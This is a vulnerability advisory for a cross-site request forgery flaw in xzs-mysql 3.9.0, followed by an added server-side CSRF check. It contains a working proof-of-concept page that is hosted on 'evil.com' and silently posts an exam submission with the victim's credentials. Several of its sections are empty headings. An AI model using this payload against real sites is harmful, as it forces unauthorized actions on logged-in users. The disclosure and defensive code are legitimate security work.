1. Description

Mindskip xzs-mysql 3.9.0 fails to implement CSRF protection, enabling attackers to coerce logged-in users into unknowingly sending state-modifying requests. This vulnerability exposes users to forced exam submissions and other unauthorized actions.

2. Affected Component

3. Type of Vulnerability

CWE-352: Cross-Site Request Forgery (CSRF)

4. Impact

5. Steps to Reproduce / PoC

  1. Ensure a user is logged into http://localhost:8000
  2. Host the following malicious page on http://evil.com:
<!DOCTYPE html>
<html>
  <body>
    <script>
      fetch("http://localhost:8000/api/student/exampaper/answer/answerSubmit", {
        method: "POST",
        headers: {
          "Content-Type": "application/json"
        },
        credentials: "include",
        body: JSON.stringify({
          questionId: null,
          doTime: 7,
          answerItems: [
            {
              questionId: 1,
              content: "A",
              contentArray: [],
              completed: true,
              itemOrder: 1
            }
          ],
          id: 1
        })
      })
      .then(r => console.log("Request Sent", r))
      .catch(e => console.error("Error", e));
    </script>
  </body>
</html>

Once the victim visits this page while authenticated, the request is executed without their knowledge.

6. Root Cause

The backend lacks CSRF tokens and does not validate the Origin or Referer headers, allowing cross-site POSTs that change server-side state.
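The following is an added example, not code from xzs-mysql: a server-side check that implements the two controls this section says are missing, Origin/Referer validation and a per-session CSRF token, and rejects the cross-site POST from the PoC while passing a same-origin request. The header name `x-csrf-token`, the request object shape and the allowed-origin list are assumptions.

```javascript
// Added example (not xzs-mysql project code). Decides whether a state-changing
// request may proceed, using Origin/Referer validation plus a session-bound
// CSRF token. Header name, request shape and allowed origins are assumptions.
const STATE_CHANGING = new Set(["POST", "PUT", "PATCH", "DELETE"]);

// Returns the origin ("scheme://host[:port]") of a URL-valued header, or null.
function originOf(value) {
  try { return new URL(value).origin; } catch { return null; }
}

// Compares two strings without early exit on the first mismatch. In production
// use crypto.timingSafeEqual; inlined here to keep the example dependency-free.
function constantTimeEqual(a, b) {
  if (a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// req: { method, headers: { origin?, referer?, "x-csrf-token"? }, sessionToken }
// Returns { allowed: boolean, reason: string }.
function checkCsrf(req, allowedOrigins) {
  if (!STATE_CHANGING.has(req.method.toUpperCase())) {
    return { allowed: true, reason: "safe method" };
  }
  const h = req.headers;
  // 1. Source check: Origin first, Referer as fallback; absence is a failure,
  //    since a browser always sends Origin on cross-site POSTs.
  const source = h.origin ? originOf(h.origin) : h.referer ? originOf(h.referer) : null;
  if (source === null) return { allowed: false, reason: "missing or unparsable Origin/Referer" };
  if (!allowedOrigins.includes(source)) return { allowed: false, reason: `untrusted origin ${source}` };
  // 2. Token check: the header token must equal the token bound to the session.
  const given = h["x-csrf-token"] || "";
  const expected = req.sessionToken || "";
  if (expected === "" || !constantTimeEqual(given, expected)) {
    return { allowed: false, reason: "CSRF token missing or invalid" };
  }
  return { allowed: true, reason: "origin and token verified" };
}

// Constructed inputs: the cross-site POST from the PoC above, and a legitimate one.
const ALLOWED = ["http://localhost:8000"];
const forged = { method: "POST", headers: { origin: "http://evil.com" }, sessionToken: "s3cr3t" };
const legit = { method: "POST", headers: { origin: "http://localhost:8000", "x-csrf-token": "s3cr3t" },
                sessionToken: "s3cr3t" };

console.log(checkCsrf(forged, ALLOWED)); // allowed: false
console.log(checkCsrf(legit, ALLOWED));  // allowed: true
```

Either control alone stops the PoC; running both means a misconfigured proxy that strips Origin, or a leaked token, does not by itself reopen the hole.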

7. Mitigation Recommendations

8. References